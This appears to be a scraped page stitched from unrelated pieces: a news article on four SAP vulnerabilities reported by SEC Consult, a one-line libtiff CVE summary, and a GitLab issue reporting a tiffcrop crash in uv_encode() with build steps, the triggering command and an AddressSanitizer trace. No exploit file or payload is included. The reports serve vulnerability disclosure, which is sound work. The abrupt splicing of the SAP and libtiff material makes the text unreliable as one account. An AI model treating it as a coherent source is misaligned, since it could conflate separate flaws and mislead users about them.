The four vulnerabilities that SEC Consult discovered and reported to SAP are CVE-2021-27610, CVE-2021-33677, CVE-2021-33684, and CVE-2023-0014.

CVE-2021-27610 is an authentication bypass vulnerability in AS ABAP that allows adversaries to escalate privileges on affected systems. The vulnerability gives attackers a way to establish their own communication with a vulnerable system and reuse leaked credentials to impersonate user accounts and claim a trusted identity. Successful exploitation can lead to full system compromise, SEC Consult said.

SEC Consult described CVE-2021-33677 as an information disclosure vulnerability in the AutoABAP/bgRFC Interface that allows an adversary to remotely enumerate user accounts and get the vulnerable service to execute specific requests to targeted hosts and ports. CVE-2021-33684 is a memory corruption bug that an attacker can exploit to remotely crash processes, gain remote code execution, and corrupt data. CVE-2023-0014, the most recent of the four flaws that SEC Consult reported to SAP, is a design issue that enables lateral movement in SAP system environments.

Greil describes most of the vulnerabilities as critical, especially CVE-2023-0014 and CVE-2021-27610, which, when combined, allow for easy lateral movement. "The current one from 2023 is especially important because it is more effort to patch because of additional necessary configuration changes," Greil says. Some deeper technical SAP understanding would be necessary to perform lateral attacks and exploiting the attack chain because the SAP technology stack and naming conventions differ from the usual IT security protocols, he notes. "The buffer overflow is also of high risk because it is exploitable before authentication. But we did not verify remote code execution," Greil says.

The vulnerabilities exist in a wide range of business-critical SAP products including SAP ERP Central Component (ECC), SAP S/4HANA, SAP Business Warehouse (BW), SAP Solution Manager (SolMan), SAP for Oil & Gas (IS Oil&Gas), SAP for Utilities (IS-U), and SAP Supplier Relationship Management (SRM).

Researchers Detail 4 SAP Bugs, Including Flaw in ABAP Kernel

libtiff 4.5.0 is vulnerable to Buffer Overflow in uv_encode() when libtiff reads a corrupted little-endian TIFF file and specifies the output to be big-endian.

Skip to content

**Get started with Code Suggestions, available for free during the beta period.**

Code faster and more efficiently with AI-powered code suggestions in VS Code. 13 languages are supported, including JavaScript, Python, Go, Java, and Kotlin. Enable Code Suggestions in your user profile preferences or see the documentation to learn more.

*   libtiff
*   libtiff
*   Issues
*   #530

Open Issue created Feb 15, 2023 by **Tseng Szu Wei@13579and24680**

**SEGV at /libtiff/tif\_luv.c:961 in uv\_encode()**

**Summary**

An SIGSEGV caused when using tiffcrop.

**Version**

    $ ./tools/tiffcrop -v
    Library Release: LIBTIFF, Version 4.5.0
    Copyright (c) 1988-1996 Sam Leffler
    Copyright (c) 1991-1996 Silicon Graphics, Inc.
    Tiffcp code: Copyright (c) 1988-1997 Sam Leffler
               : Copyright (c) 1991-1997 Silicon Graphics, Inc
    Tiffcrop additions: Copyright (c) 2007-2010 Richard Nolde
    
    $ git log --oneline -1
    c861f25c (HEAD -> master, origin/master, origin/HEAD) Merge branch 'tiffcrop_dont_reuse_input_buffer_fix_527' into 'master'

**Steps to reproduce****make**

    git clone https://gitlab.com/libtiff/libtiff.git
    cd libtiff
    ./autogen.sh
    ./configure
    make

**run**

    $ ./tools/tiffcrop -B poc temp
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3120 (0xc30) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 3120 (Tag 3120) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFAdvanceDirectory: Error fetching directory count.
    fish: Job 1, './tools/tiffcrop -B poc temp' terminated by signal SIGSEGV (Address boundary error)

**Platform**

    $ uname -a
    Linux 13579 5.15.0-56-generic #62~20.04.1-Ubuntu SMP Tue Nov 22 21:24:20 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    
    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

**ASAN report**

    ./tools/tiffcrop -B poc temp
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 3120 (0xc30) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 3120 (Tag 3120) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFAdvanceDirectory: Error fetching directory count.
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1381705==ERROR: AddressSanitizer: SEGV on unknown address 0x7f1876003420 (pc 0x7f1c75f78cb0 bp 0x7ffc95fdf630 sp 0x7ffc95fdf600 T0)
    ==1381705==The signal is caused by a READ memory access.
        #0 0x7f1c75f78caf in uv_encode /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:961
        #1 0x7f1c75f797b2 in LogLuv24fromXYZ /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:1057
        #2 0x7f1c75f79f58 in Luv24fromXYZ /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:1120
        #3 0x7f1c75f76522 in LogLuvEncode24 /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:569
        #4 0x7f1c75f775c7 in LogLuvEncodeStrip /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:722
        #5 0x7f1c75fcb6bb in TIFFWriteEncodedStrip /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_write.c:308
        #6 0x563fd6857160 in writeBufferToContigStrips /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:1317
        #7 0x563fd688022e in writeCroppedImage /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:9197
        #8 0x563fd685f4d5 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:2834
        #9 0x7f1c75a96082 in __libc_start_main ../csu/libc-start.c:308
        #10 0x563fd6855b6d in _start (/home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/.libs/tiffcrop+0x9b6d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:961 in uv_encode
    ==1381705==ABORTING

**poc**

poc

Tag

#buffer_overflow